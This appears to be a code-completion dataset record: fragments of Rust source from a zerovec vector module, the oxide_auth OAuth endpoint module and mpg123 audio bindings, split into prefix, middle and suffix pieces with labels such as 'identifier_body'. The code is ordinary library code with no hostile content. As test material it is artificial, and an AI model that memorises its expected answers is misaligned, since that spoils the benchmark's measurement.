/// assert!(matches!(vzv, VarZeroVec::Borrowed(_)));
/// ```
Borrowed(&'a VarZeroSlice<T, F>),
}
impl<'a, T: ?Sized, F> Clone for VarZeroVec<'a, T, F> {
fn clone(&self) -> Self {
match *self {
VarZeroVec::Owned(ref o) => o.clone().into(),
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> fmt::Debug for VarZeroVec<'_, T, F>
where
T: fmt::Debug,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
VarZeroSlice::fmt(self, f)
}
}
impl<'a, T: ?Sized, F> From<VarZeroVecOwned<T, F>> for VarZeroVec<'a, T, F> {
#[inline]
fn from(other: VarZeroVecOwned<T, F>) -> Self {
VarZeroVec::Owned(other)
}
}
impl<'a, T: ?Sized, F> From<&'a VarZeroSlice<T, F>> for VarZeroVec<'a, T, F> {
fn from(other: &'a VarZeroSlice<T, F>) -> Self {
VarZeroVec::Borrowed(other)
}
}
impl<'a, T: ?Sized + VarULE, F: VarZeroVecFormat> From<VarZeroVec<'a, T, F>>
for VarZeroVecOwned<T, F>
{
#[inline]
fn from(other: VarZeroVec<'a, T, F>) -> Self {
match other {
VarZeroVec::Owned(o) => o,
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized> Default for VarZeroVec<'_, T> {
#[inline]
fn default() -> Self {
Self::new()
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> Deref for VarZeroVec<'_, T, F> {
type Target = VarZeroSlice<T, F>;
fn deref(&self) -> &VarZeroSlice<T, F> {
self.as_slice()
}
}
impl<'a, T: VarULE + ?Sized, F: VarZeroVecFormat> VarZeroVec<'a, T, F> {
/// Creates a new, empty `VarZeroVec<T>`.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let vzv: VarZeroVec<str> = VarZeroVec::new();
/// assert!(vzv.is_empty());
/// ```
#[inline]
pub const fn new() -> Self {
Self::Borrowed(VarZeroSlice::new_empty())
}
/// Parse a VarZeroVec from a slice of the appropriate format
///
/// Slices of the right format can be obtained via [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "baz");
/// assert_eq!(&vec[3], "quux");
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn parse_byte_slice(slice: &'a [u8]) -> Result<Self, ZeroVecError> {
let borrowed = VarZeroSlice::<T, F>::parse_byte_slice(slice)?;
Ok(VarZeroVec::Borrowed(borrowed))
}
/// Uses a `&[u8]` buffer as a `VarZeroVec<T>` without any verification.
///
/// # Safety
///
/// `bytes` need to be an output from [`VarZeroSlice::as_bytes()`].
pub const unsafe fn from_bytes_unchecked(bytes: &'a [u8]) -> Self {
Self::Borrowed(core::mem::
|
/// # use std::str::Utf8Error;
|
random_line_split
|
mod.rs
|
mut self) -> Option<&mut dyn OwnerSolicitor<Request>>;
/// Determine the required scopes for a request.
///
/// The client must fulfill any one scope, so returning an empty slice will always deny the
/// request.
fn scopes(&mut self) -> Option<&mut dyn Scopes<Request>>;
/// Generate a prototype response.
///
/// The endpoint can rely on this being called at most once for each flow, if it wants
/// to preallocate the response or return a handle on an existing prototype.
fn response(
&mut self, request: &mut Request, kind: Template,
) -> Result<Request::Response, Self::Error>;
/// Wrap an error.
fn error(&mut self, err: OAuthError) -> Self::Error;
/// Wrap an error in the request/response types.
fn web_error(&mut self, err: Request::Error) -> Self::Error;
/// Get the central extension instance this endpoint.
///
/// Returning `None` is the default implementation and acts as simply providing any extensions.
fn extension(&mut self) -> Option<&mut dyn Extension> {
None
}
}
impl<'a> Template<'a> {
/// Create an OK template
pub fn new_ok() -> Self {
InnerTemplate::Ok.into()
}
/// Create a bad request template
pub fn new_bad(access_token_error: Option<&'a mut AccessTokenError>) -> Self {
InnerTemplate::BadRequest { access_token_error }.into()
}
/// Create an unauthorized template
pub fn new_unauthorized(
error: Option<ResourceError>, access_token_error: Option<&'a mut AccessTokenError>,
) -> Self {
InnerTemplate::Unauthorized {
error,
access_token_error,
}
.into()
}
/// Create a redirect template
pub fn new_redirect(authorization_error: Option<&'a mut AuthorizationError>) -> Self {
InnerTemplate::Redirect { authorization_error }.into()
}
/// The corresponding status code.
pub fn status(&self) -> ResponseStatus {
match self.inner {
InnerTemplate::Unauthorized { .. } => ResponseStatus::Unauthorized,
InnerTemplate::Redirect { .. } => ResponseStatus::Redirect,
InnerTemplate::BadRequest { .. } => ResponseStatus::BadRequest,
InnerTemplate::Ok => ResponseStatus::Ok,
}
}
/// Supplementary information about an error in the authorization code flow.
///
/// The referenced object can be inspected and manipulated to provided additional information
/// that is specific to this server or endpoint. Such information could be an error page with
/// explanatory information or a customized message.
///
/// ```
/// # use oxide_auth::endpoint::Template;
/// fn explain(mut template: Template) {
/// if let Some(error) = template.authorization_error() {
/// eprintln!("[authorization] An error occurred: {:?}", error.kind());
/// error.explain("This server is still in its infancy. Sorry.");
/// error.explain_uri("/authorization_error.html".parse().unwrap());
/// }
/// }
/// ```
pub fn authorization_error(&mut self) -> Option<&mut AuthorizationError> {
match &mut self.inner {
InnerTemplate::Redirect {
authorization_error, ..
} => reborrow(authorization_error),
_ => None,
}
}
/// Supplementary information about an error in the access token flow.
///
/// The referenced object can be inspected and manipulated to provided additional information
/// that is specific to this server or endpoint. Such information could be an error page with
/// explanatory information or a customized message.
///
/// ```
/// # use oxide_auth::endpoint::Template;
/// fn explain(mut template: Template) {
/// if let Some(error) = template.access_token_error() {
/// eprintln!("[access_code] An error occurred: {:?}", error.kind());
/// error.explain("This server is still in its infancy. Sorry.");
/// error.explain_uri("/access_token_error.html".parse().unwrap());
/// }
/// }
/// ```
pub fn access_token_error(&mut self) -> Option<&mut AccessTokenError> {
match &mut self.inner {
InnerTemplate::Unauthorized {
access_token_error, ..
} => reborrow(access_token_error),
InnerTemplate::BadRequest {
access_token_error, ..
} => reborrow(access_token_error),
_ => None,
}
}
}
/// Reborrow contained optional reference.
///
/// Slightly tweaked from an `Into`, there is `Option<&'a mut T>` from `&'a mut Option<T>`.
fn reborrow<'a, T>(opt: &'a mut Option<&mut T>) -> Option<&'a mut T> {
match opt {
// Magically does correct lifetime coercision.
Some(inner) => Some(inner),
None => None,
}
}
impl<'a, W: WebRequest> WebRequest for &'a mut W {
type Error = W::Error;
type Response = W::Response;
fn query(&mut self) -> Result<Cow<dyn QueryParameter + 'static>, Self::Error> {
(**self).query()
}
fn urlbody(&mut self) -> Result<Cow<dyn QueryParameter + 'static>, Self::Error> {
(**self).urlbody()
}
fn authheader(&mut self) -> Result<Option<Cow<str>>, Self::Error> {
(**self).authheader()
}
}
impl<'a, R: WebRequest, E: Endpoint<R>> Endpoint<R> for &'a mut E {
type Error = E::Error;
fn registrar(&self) -> Option<&dyn Registrar> {
(**self).registrar()
}
fn authorizer_mut(&mut self) -> Option<&mut dyn Authorizer> {
(**self).authorizer_mut()
}
fn issuer_mut(&mut self) -> Option<&mut dyn Issuer> {
(**self).issuer_mut()
}
fn owner_solicitor(&mut self) -> Option<&mut dyn OwnerSolicitor<R>> {
(**self).owner_solicitor()
}
fn scopes(&mut self) -> Option<&mut dyn Scopes<R>> {
(**self).scopes()
}
fn response(&mut self, request: &mut R, kind: Template) -> Result<R::Response, Self::Error> {
(**self).response(request, kind)
}
fn error(&mut self, err: OAuthError) -> Self::Error {
(**self).error(err)
}
fn web_error(&mut self, err: R::Error) -> Self::Error {
(**self).web_error(err)
}
fn extension(&mut self) -> Option<&mut dyn Extension> {
(**self).extension()
}
}
impl<'a, R: WebRequest, E: Endpoint<R> + 'a> Endpoint<R> for Box<E> {
type Error = E::Error;
fn registrar(&self) -> Option<&dyn Registrar> {
(**self).registrar()
}
fn authorizer_mut(&mut self) -> Option<&mut dyn Authorizer> {
(**self).authorizer_mut()
}
fn issuer_mut(&mut self) -> Option<&mut dyn Issuer> {
(**self).issuer_mut()
}
fn owner_solicitor(&mut self) -> Option<&mut dyn OwnerSolicitor<R>> {
(**self).owner_solicitor()
}
fn scopes(&mut self) -> Option<&mut dyn Scopes<R>> {
(**self).scopes()
}
fn response(&mut self, request: &mut R, kind: Template) -> Result<R::Response, Self::Error> {
(**self).response(request, kind)
}
fn error(&mut self, err: OAuthError) -> Self::Error {
(**self).error(err)
}
fn web_error(&mut self, err: R::Error) -> Self::Error {
(**self).web_error(err)
}
fn extension(&mut self) -> Option<&mut dyn Extension> {
(**self).extension()
}
}
impl Extension for () {}
impl<'a, W: WebRequest, S: OwnerSolicitor<W> + 'a + ?Sized> OwnerSolicitor<W> for &'a mut S {
fn check_consent(
&mut self, request: &mut W, solicitation: Solicitation,
) -> OwnerConsent<W::Response> {
(**self).check_consent(request, solicitation)
}
}
impl<'a, W: WebRequest, S: OwnerSolicitor<W> + 'a + ?Sized> OwnerSolicitor<W> for Box<S> {
fn check_consent(
&mut self, request: &mut W, solicitation: Solicitation,
) -> OwnerConsent<W::Response> {
(**self).check_consent(request, solicitation)
}
}
impl<W: WebRequest> Scopes<W> for [Scope] {
fn scopes(&mut self, _: &mut W) -> &[Scope] {
self
}
}
impl<W: WebRequest> Scopes<W> for Vec<Scope> {
fn scopes(&mut self, _: &mut W) -> &[Scope] {
self.as_slice()
}
}
impl<'a, W: WebRequest> Scopes<W> for &'a [Scope] {
fn scopes(&mut self, _: &mut W) -> &[Scope]
|
{
self
}
|
identifier_body
|
|
mod.rs
|
this endpoint can access one.
///
/// Returning `None` will implicate failing any flow that requires an authorizer but does not
/// have any effect on flows that do not require one.
fn authorizer_mut(&mut self) -> Option<&mut dyn Authorizer>;
/// An issuer if this endpoint can access one.
///
/// Returning `None` will implicate failing any flow that requires an issuer but does not have
/// any effect on flows that do not require one.
fn issuer_mut(&mut self) -> Option<&mut dyn Issuer>;
/// Return the system that checks owner consent.
///
/// Returning `None` will implicated failing the authorization code flow but does have any
/// effect on other flows.
fn owner_solicitor(&mut self) -> Option<&mut dyn OwnerSolicitor<Request>>;
/// Determine the required scopes for a request.
///
/// The client must fulfill any one scope, so returning an empty slice will always deny the
/// request.
fn scopes(&mut self) -> Option<&mut dyn Scopes<Request>>;
/// Generate a prototype response.
///
/// The endpoint can rely on this being called at most once for each flow, if it wants
/// to preallocate the response or return a handle on an existing prototype.
fn response(
&mut self, request: &mut Request, kind: Template,
) -> Result<Request::Response, Self::Error>;
/// Wrap an error.
fn error(&mut self, err: OAuthError) -> Self::Error;
/// Wrap an error in the request/response types.
fn web_error(&mut self, err: Request::Error) -> Self::Error;
/// Get the central extension instance this endpoint.
///
/// Returning `None` is the default implementation and acts as simply providing any extensions.
fn extension(&mut self) -> Option<&mut dyn Extension> {
None
}
}
impl<'a> Template<'a> {
/// Create an OK template
pub fn new_ok() -> Self {
InnerTemplate::Ok.into()
}
/// Create a bad request template
pub fn new_bad(access_token_error: Option<&'a mut AccessTokenError>) -> Self {
InnerTemplate::BadRequest { access_token_error }.into()
}
/// Create an unauthorized template
pub fn new_unauthorized(
error: Option<ResourceError>, access_token_error: Option<&'a mut AccessTokenError>,
) -> Self {
InnerTemplate::Unauthorized {
error,
access_token_error,
}
.into()
}
/// Create a redirect template
pub fn new_redirect(authorization_error: Option<&'a mut AuthorizationError>) -> Self {
InnerTemplate::Redirect { authorization_error }.into()
}
/// The corresponding status code.
pub fn status(&self) -> ResponseStatus {
match self.inner {
InnerTemplate::Unauthorized { .. } => ResponseStatus::Unauthorized,
InnerTemplate::Redirect { .. } => ResponseStatus::Redirect,
InnerTemplate::BadRequest { .. } => ResponseStatus::BadRequest,
InnerTemplate::Ok => ResponseStatus::Ok,
}
}
/// Supplementary information about an error in the authorization code flow.
///
/// The referenced object can be inspected and manipulated to provided additional information
/// that is specific to this server or endpoint. Such information could be an error page with
/// explanatory information or a customized message.
///
/// ```
/// # use oxide_auth::endpoint::Template;
/// fn explain(mut template: Template) {
/// if let Some(error) = template.authorization_error() {
/// eprintln!("[authorization] An error occurred: {:?}", error.kind());
/// error.explain("This server is still in its infancy. Sorry.");
/// error.explain_uri("/authorization_error.html".parse().unwrap());
/// }
/// }
/// ```
pub fn authorization_error(&mut self) -> Option<&mut AuthorizationError> {
match &mut self.inner {
InnerTemplate::Redirect {
authorization_error, ..
} => reborrow(authorization_error),
_ => None,
}
}
/// Supplementary information about an error in the access token flow.
///
/// The referenced object can be inspected and manipulated to provided additional information
/// that is specific to this server or endpoint. Such information could be an error page with
/// explanatory information or a customized message.
///
/// ```
/// # use oxide_auth::endpoint::Template;
/// fn explain(mut template: Template) {
/// if let Some(error) = template.access_token_error() {
/// eprintln!("[access_code] An error occurred: {:?}", error.kind());
/// error.explain("This server is still in its infancy. Sorry.");
/// error.explain_uri("/access_token_error.html".parse().unwrap());
/// }
/// }
/// ```
pub fn access_token_error(&mut self) -> Option<&mut AccessTokenError> {
match &mut self.inner {
InnerTemplate::Unauthorized {
access_token_error, ..
} => reborrow(access_token_error),
InnerTemplate::BadRequest {
access_token_error, ..
} => reborrow(access_token_error),
_ => None,
}
}
}
/// Reborrow contained optional reference.
///
/// Slightly tweaked from an `Into`, there is `Option<&'a mut T>` from `&'a mut Option<T>`.
fn reborrow<'a, T>(opt: &'a mut Option<&mut T>) -> Option<&'a mut T> {
match opt {
// Magically does correct lifetime coercision.
Some(inner) => Some(inner),
None => None,
}
}
impl<'a, W: WebRequest> WebRequest for &'a mut W {
type Error = W::Error;
type Response = W::Response;
fn query(&mut self) -> Result<Cow<dyn QueryParameter + 'static>, Self::Error> {
(**self).query()
}
fn urlbody(&mut self) -> Result<Cow<dyn QueryParameter + 'static>, Self::Error> {
(**self).urlbody()
}
fn authheader(&mut self) -> Result<Option<Cow<str>>, Self::Error> {
(**self).authheader()
}
}
impl<'a, R: WebRequest, E: Endpoint<R>> Endpoint<R> for &'a mut E {
type Error = E::Error;
fn registrar(&self) -> Option<&dyn Registrar> {
(**self).registrar()
}
fn authorizer_mut(&mut self) -> Option<&mut dyn Authorizer> {
(**self).authorizer_mut()
}
fn issuer_mut(&mut self) -> Option<&mut dyn Issuer> {
(**self).issuer_mut()
}
fn owner_solicitor(&mut self) -> Option<&mut dyn OwnerSolicitor<R>> {
(**self).owner_solicitor()
}
fn scopes(&mut self) -> Option<&mut dyn Scopes<R>> {
(**self).scopes()
}
fn response(&mut self, request: &mut R, kind: Template) -> Result<R::Response, Self::Error> {
(**self).response(request, kind)
}
fn error(&mut self, err: OAuthError) -> Self::Error {
(**self).error(err)
}
fn web_error(&mut self, err: R::Error) -> Self::Error {
(**self).web_error(err)
}
fn extension(&mut self) -> Option<&mut dyn Extension> {
(**self).extension()
}
}
impl<'a, R: WebRequest, E: Endpoint<R> + 'a> Endpoint<R> for Box<E> {
type Error = E::Error;
fn registrar(&self) -> Option<&dyn Registrar> {
(**self).registrar()
}
fn authorizer_mut(&mut self) -> Option<&mut dyn Authorizer> {
(**self).authorizer_mut()
}
fn issuer_mut(&mut self) -> Option<&mut dyn Issuer> {
(**self).issuer_mut()
}
fn owner_solicitor(&mut self) -> Option<&mut dyn OwnerSolicitor<R>> {
(**self).owner_solicitor()
}
fn scopes(&mut self) -> Option<&mut dyn Scopes<R>> {
(**self).scopes()
}
fn response(&mut self, request: &mut R, kind: Template) -> Result<R::Response, Self::Error> {
(**self).response(request, kind)
}
fn error(&mut self, err: OAuthError) -> Self::Error {
(**self).error(err)
}
fn web_error(&mut self, err: R::Error) -> Self::Error {
(**self).web_error(err)
}
fn extension(&mut self) -> Option<&mut dyn Extension> {
(**self).extension()
}
}
impl Extension for () {}
impl<'a, W: WebRequest, S: OwnerSolicitor<W> + 'a + ?Sized> OwnerSolicitor<W> for &'a mut S {
fn check_consent(
&mut self, request: &mut W, solicitation: Solicitation,
) -> OwnerConsent<W::Response> {
(**self).check_consent(request, solicitation)
}
}
impl<'a, W: WebRequest, S: OwnerSolicitor<W> + 'a + ?Sized> OwnerSolicitor<W> for Box<S> {
fn
|
check_consent
|
identifier_name
|
|
mod.rs
|
mod query;
#[cfg(test)]
mod tests;
use std::borrow::Cow;
use std::marker::PhantomData;
pub use crate::primitives::authorizer::Authorizer;
pub use crate::primitives::issuer::Issuer;
pub use crate::primitives::registrar::Registrar;
pub use crate::primitives::scope::Scope;
use crate::code_grant::resource::{Error as ResourceError};
use crate::code_grant::error::{AuthorizationError, AccessTokenError};
use url::Url;
// Re-export the extension traits under prefixed names.
pub use crate::code_grant::authorization::Extension as AuthorizationExtension;
pub use crate::code_grant::accesstoken::Extension as AccessTokenExtension;
pub use crate::code_grant::client_credentials::Extension as ClientCredentialsExtension;
pub use crate::primitives::registrar::PreGrant;
pub use self::authorization::*;
pub use self::accesstoken::*;
pub use self::client_credentials::ClientCredentialsFlow;
pub use self::error::OAuthError;
pub use self::refresh::RefreshFlow;
pub use self::resource::*;
pub use self::query::*;
/// Answer from OwnerAuthorizer to indicate the owners choice.
pub enum OwnerConsent<Response: WebResponse> {
/// The owner did not authorize the client.
Denied,
/// The owner has not yet decided, i.e. the returned page is a form for the user.
InProgress(Response),
/// Authorization was granted by the specified user.
Authorized(String),
/// An error occurred while checking authorization.
Error(Response::Error),
}
/// Modifiable reason for creating a response to the client.
///
/// Not all responses indicate failure. A redirect will also occur in the a regular of providing an
/// access token to the third party client. When an error is present (see several methods) it is
/// mostly possible to customize it. This hook provides advanced endpoints with the opportunity to
/// set additional parameters and informational messages before they are encoded.
///
/// See the provided methods for more information and examples.
#[derive(Debug)]
pub struct Template<'a> {
inner: InnerTemplate<'a>,
}
/// The general manner of the response.
///
/// These are parallels for HTTP status codes of the same name.
#[derive(Clone, Copy, Debug, Hash, PartialEq, Eq, PartialOrd, Ord)]
pub enum ResponseStatus {
/// The response is issued because the requesting party was not authorized.
Unauthorized,
/// The response redirects in the code grant flow.
Redirect,
/// The request was malformed.
BadRequest,
/// This response is normal and expected.
Ok,
}
/// Encapsulated different types of responses reasons.
///
/// Each variant contains some form of context information about the response. This can be used either
/// purely informational or in some cases provides additional customization points. The addition of
/// fields to some variant context can occur in any major release until `1.0`. It is discouraged to
/// exhaustively match the fields directly. Since some context could not permit cloning, the enum will
/// not derive this until this has shown unlikely but strongly requested. Please open an issue if you
/// think the pros or cons should be evaluated differently.
#[derive(Debug)]
#[non_exhaustive]
enum InnerTemplate<'a> {
/// Authorization to access the resource has not been granted.
Unauthorized {
/// The underlying cause for denying access.
///
/// The http authorization header is to be set according to this field.
#[allow(dead_code)]
error: Option<ResourceError>,
/// Information on an access token error.
///
/// Endpoints may modify this description to add additional explanatory text or a reference
/// uri for clients seeking explanation.
access_token_error: Option<&'a mut AccessTokenError>,
},
/// Redirect the user-agent to another url.
///
/// The endpoint has the opportunity to inspect and modify error information to some extent.
/// For example to log an error rate or to provide a pointer to a custom human readable
/// explanation page. The response will generally not contain a body.
Redirect {
/// Information on an authorization error.
///
/// Endpoints may modify this description to add additional explanatory text or a reference
/// uri for clients or resource owners seeking explanation.
authorization_error: Option<&'a mut AuthorizationError>,
},
/// The request did not conform to specification or was otheriwse invalid.
///
/// As such, it was not handled further. Some processes still warrant a response body to be
/// set in the case of an invalid request, containing additional information for the client.
/// For example, an authorized client sending a malformed but authenticated request for an
/// access token will receive additional hints on the cause of his mistake.
BadRequest {
/// Information on an invalid-access-token-request error.
///
/// Endpoints may modify this description to add additional explanatory text or a reference
/// uri for clients seeking explanation.
access_token_error: Option<&'a mut AccessTokenError>,
},
/// An expected, normal response.
///
/// The content of the response may require precise semantics to be standard compliant,
/// therefore it is constructed using the `WebResponse` trait methods. Try not to tamper with
/// the format too much, such as unsetting a body etc. after the flow has finished.
Ok,
}
/// A pending solicitation to a resource owner.
///
/// This encapsulates the information available to an [`OwnerSolicitor`] when querying consent
/// information.
///
/// [`OwnerSolicitor`]: trait.OwnerSolicitor.html
pub struct Solicitation<'flow> {
pub(crate) grant: Cow<'flow, PreGrant>,
pub(crate) state: Option<Cow<'flow, str>>,
}
impl<'flow> Solicitation<'flow> {
/// Clone the solicitation into an owned structure.
///
/// This mainly helps with sending it across threads.
pub fn into_owned(self) -> Solicitation<'static> {
Solicitation {
grant: Cow::Owned(self.grant.into_owned()),
state: self.state.map(|state| Cow::Owned(state.into_owned())),
}
}
/// Return the pre-grant associated with the request.
///
/// The information in the `PreGrant` is the authoritative information on the client and scopes
/// associated with the request. It has already been validated against those settings and
/// restrictions that were applied when registering the client.
pub fn pre_grant(&self) -> &PreGrant {
self.grant.as_ref()
}
/// The state provided by the client request.
///
/// This will need to be provided to the response back to the client so it must be preserved
/// across a redirect or a consent screen presented by the user agent.
pub fn state(&self) -> Option<&str> {
match self.state {
None => None,
Some(ref state) => Some(&state),
}
}
/// Create a new solicitation request from a pre grant.
///
/// You usually wouldn't need to call this manually as it is called by the endpoint's flow and
/// then handed with all available information to the solicitor.
pub fn new(grant: &'flow PreGrant) -> Self {
Solicitation {
grant: Cow::Borrowed(grant),
state: None,
}
}
/// Add a client state to the solicitation.
pub fn with_state(self, state: &'flow str) -> Self {
Solicitation {
state: Some(Cow::Borrowed(state)),
..self
}
}
}
/// Checks consent with the owner of a resource, identified in a request.
///
/// See [`frontends::simple`] for an implementation that permits arbitrary functions.
///
/// [`frontends::simple`]: ../frontends/simple/endpoint/struct.FnSolicitor.html
pub trait OwnerSolicitor<Request: WebRequest> {
/// Ensure that a user (resource owner) is currently authenticated (for example via a session
/// cookie) and determine if he has agreed to the presented grants.
fn check_consent(&mut self, _: &mut Request, _: Solicitation) -> OwnerConsent<Request::Response>;
}
/// Determine the scopes applying to a request of a resource.
///
/// It is possible to use a slice of [`Scope`]s as an implementation of this trait. You can inspect
/// the request that was used to access the resource for which the scopes are to be determined but
/// should generally avoid doing so. Sometimes the scope depends on external parameters and this is
/// unavoidable, e.g. if the scope is created dynamically from the path of the resource.
///
/// ## Example
///
/// Here's a possible new implementation that allows you to update your scope list at runtime:
///
/// ```
/// # use oxide_auth::endpoint::Scopes;
/// # use oxide_auth::endpoint::WebRequest;
/// use oxide_auth::primitives::scope::Scope;
/// use std::sync::{Arc, RwLock};
///
/// struct MyScopes {
/// update: RwLock<Arc<[Scope]>>,
/// current: Arc<[Scope]>,
/// };
///
/// impl<R: WebRequest> Scopes<R> for MyScopes {
/// fn scopes(&mut self, _: &mut R) -> &[Scope] {
/// let update = self.update.read().unwrap();
/// if !Arc::ptr_eq(&update, &self.current) {
/// self.current = update.clone();
/// }
/// &self.current
/// }
/// }
/// ```
///
/// [`Scope`]: ../primitives/scope/struct.Scope.html
pub trait Scopes<Request: WebRequest> {
/// A list of
|
random_line_split
|
||
lib.rs
|
Layer1,
/// mpeg layer-2 decoder enabled
DecodeLayer2,
/// mpeg layer-3 decoder enabled
DecodeLayer3,
/// accurate decoder rounding
DecodeAccurate,
/// downsample (sample omit)
DecodeDownsample,
/// flexible rate decoding
DecodeNtoM,
/// ICY support
ParseICY,
/// Reader with timeout (network).
TimeoutRead,
}
#[repr(i32)]
#[derive(Copy,Clone,Debug,PartialEq)]
pub enum Mpg123Error {
/// Message: Track ended. Stop decoding.
Done = -12,
/// Message: Output format will be different on next call. Note
/// that some libmpg123 versions between 1.4.3 and 1.8.0 insist on
/// you calling mpg123_getformat() after getting this message
/// code. Newer verisons behave like advertised: You have the
/// chance to call mpg123_getformat(), but you can also just
/// continue decoding and get your data.
NewFormat = -11,
/// Message: For feed reader: "Feed me more!" (call mpg123_feed()
/// or mpg123_decode() with some new input data).
NeedMore = -10,
/// Generic Error
Err = -1,
/// Success
Ok = 0,
/// Unable to set up output format!
BadOutFormat = 1,
/// Invalid channel number specified.
BadChannel = 2,
/// Invalid sample rate specified.
BadRate = 3,
/// Unable to allocate memory for 16 to 8 converter table!
Err16to8Table = 4,
/// Bad parameter id!
BadParam = 5,
/// Bad buffer given -- invalid pointer or too small size.
BadBuffer = 6,
/// Out of memory -- some malloc() failed.
OutOfMem = 7,
/// You didn't initialize the library!
NotInitialized = 8,
/// Invalid decoder choice.
BadDecoder = 9,
/// Invalid mpg123 handle.
BadHandle = 10,
/// Unable to initialize frame buffers (out of memory?).
NoBuffers = 11,
/// Invalid RVA mode.
BadRva = 12,
/// This build doesn't support gapless decoding.
NoGapless = 13,
/// Not enough buffer space.
NoSpace = 14,
/// Incompatible numeric data types.
BadTypes = 15,
/// Bad equalizer band.
BadBand = 16,
/// Null pointer given where valid storage address needed.
ErrNull = 17,
/// Error reading the stream.
ErrReader = 18,
/// Cannot seek from end (end is not known).
NoSeekFromEnd = 19,
/// Invalid 'whence' for seek function.
BadWhence = 20,
/// Build does not support stream timeouts.
NoTimeout = 21,
/// File access error.
BadFile = 22,
/// Seek not supported by stream.
NoSeek = 23,
/// No stream opened.
NoReader = 24,
/// Bad parameter handle.
BadPars = 25,
/// Bad parameters to mpg123_index() and mpg123_set_index()
BadIndexPar = 26,
/// Lost track in bytestream and did not try to resync.
OutOfSync = 27,
/// Resync failed to find valid MPEG data.
ResyncFail = 28,
/// No 8bit encoding possible.
No8bit = 29,
/// Stack aligmnent error
BadAlign = 30,
/// Null input buffer with non-zero size...
NullBuffer = 31,
/// Relative seek not possible (screwed up file offset)
NoRelseek = 32,
/// You gave a null pointer somewhere where you shouldn't have.
NullPointer = 33,
/// Bad key value given.
BadKey = 34,
/// No frame index in this build.
NoIndex = 35,
/// Something with frame index went wrong.
IndexFail = 36,
/// Something prevents a proper decoder setup
BadDecoderSetup = 37,
/// This feature has not been built into libmpg123.
MissingFeature = 38,
/// A bad value has been given, somewhere.
BadValue = 39,
/// Low-level seek failed.
LseekFailed = 40,
/// Custom I/O not prepared.
BadCustomIo = 41,
/// Offset value overflow during translation of large file API
/// calls -- your client program cannot handle that large file.
LfsOverflow = 42,
/// Some integer overflow.
IntOverflow = 43,
}
impl From<c_int> for Mpg123Error {
fn from(v: c_int) -> Self {
use Mpg123Error::*;
match v {
-12 => Done,
-11 => NewFormat,
-10 => NeedMore,
-1 => Err,
0 => Ok,
1 => BadOutFormat,
2 => BadChannel,
3 => BadRate,
4 => Err16to8Table,
5 => BadParam,
6 => BadBuffer,
7 => OutOfMem,
8 => NotInitialized,
9 => BadDecoder,
10 => BadHandle,
11 => NoBuffers,
12 => BadRva,
13 => NoGapless,
14 => NoSpace,
15 => BadTypes,
16 => BadBand,
17 => ErrNull,
18 => ErrReader,
19 => NoSeekFromEnd,
20 => BadWhence,
21 => NoTimeout,
22 => BadFile,
23 => NoSeek,
24 => NoReader,
25 => BadPars,
26 => BadIndexPar,
27 => OutOfSync,
28 => ResyncFail,
29 => No8bit,
30 => BadAlign,
31 => NullBuffer,
32 => NoRelseek,
33 => NullPointer,
34 => BadKey,
35 => NoIndex,
36 => IndexFail,
37 => BadDecoderSetup,
38 => MissingFeature,
39 => BadValue,
40 => LseekFailed,
41 => BadCustomIo,
42 => LfsOverflow,
43 => IntOverflow,
_ => Err,
}
}
}
// This encoding is disasterous, but we have what we have.
bitflags!{
pub flags Enc : i32 {
const ENC_8 = 0x00f,
const ENC_16 = 0x040,
const ENC_24 = 0x4000,
const ENC_32 = 0x100,
const ENC_SIGNED = 0x080,
const ENC_FLOAT = 0xe00,
// Specific formats
const ENC_UNSIGNED_8 = 0x01,
const ENC_SIGNED_8 = ENC_SIGNED.bits | 0x02,
const ENC_ULAW_8 = 0x04,
const ENC_ALAW_8 = 0x08,
const ENC_SIGNED_16 = 0x10 | ENC_16.bits | ENC_SIGNED.bits,
const ENC_UNSIGNED_16 = 0x20 | ENC_16.bits,
const ENC_SIGNED_32 = 0x1000 | ENC_32.bits | ENC_SIGNED.bits,
const ENC_UNSIGNED_32 = 0x2000 | ENC_32.bits,
const ENC_SIGNED_24 = 0x1000 | ENC_24.bits | ENC_SIGNED.bits,
const ENC_UNSIGNED_24 = 0x2000 | ENC_24.bits,
const ENC_FLOAT_32 = 0x200,
const ENC_FLOAT_64 = 0x400,
const ENC_ANY = (ENC_UNSIGNED_8.bits | ENC_SIGNED_8.bits
| ENC_ULAW_8.bits | ENC_ALAW_8.bits
| ENC_SIGNED_16.bits | ENC_UNSIGNED_16.bits
| ENC_SIGNED_32.bits | ENC_UNSIGNED_32.bits
| ENC_SIGNED_24.bits | ENC_UNSIGNED_24.bits
| ENC_FLOAT_32.bits | ENC_FLOAT_64.bits),
}
}
impl Enc {
/// Return the number of bytes per mono sample
pub fn
|
size
|
identifier_name
|
|
lib.rs
|
// Decoder selection
pub fn mpg123_decoders() -> *const *const c_char;
pub fn mpg123_supported_decoders() -> *const *const c_char;
pub fn mpg123_decoder(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_current_decoder(handle: *mut Mpg123Handle) -> *const c_char;
// Output format
pub fn mpg123_rates(list: *mut *const c_long, count: *mut size_t);
pub fn mpg123_encodings(list: *mut *const c_int, count: *mut size_t);
pub fn mpg123_encsize(encoding: c_int) -> c_int;
pub fn mpg123_format_none(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_format_all(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_format(handle: *mut Mpg123Handle, rate: c_int, channels: c_int, encodings: c_int) -> c_int;
pub fn mpg123_format_support(handle: *mut Mpg123Handle, rate: c_int, encodings: c_int) -> c_int;
pub fn mpg123_getformat(handle: *mut Mpg123Handle, rate: *mut c_long, channels: *mut c_int, encodings: *mut c_int) -> c_int;
// File input and decoding
pub fn mpg123_open(handle: *mut Mpg123Handle, path: *const c_char) -> c_int;
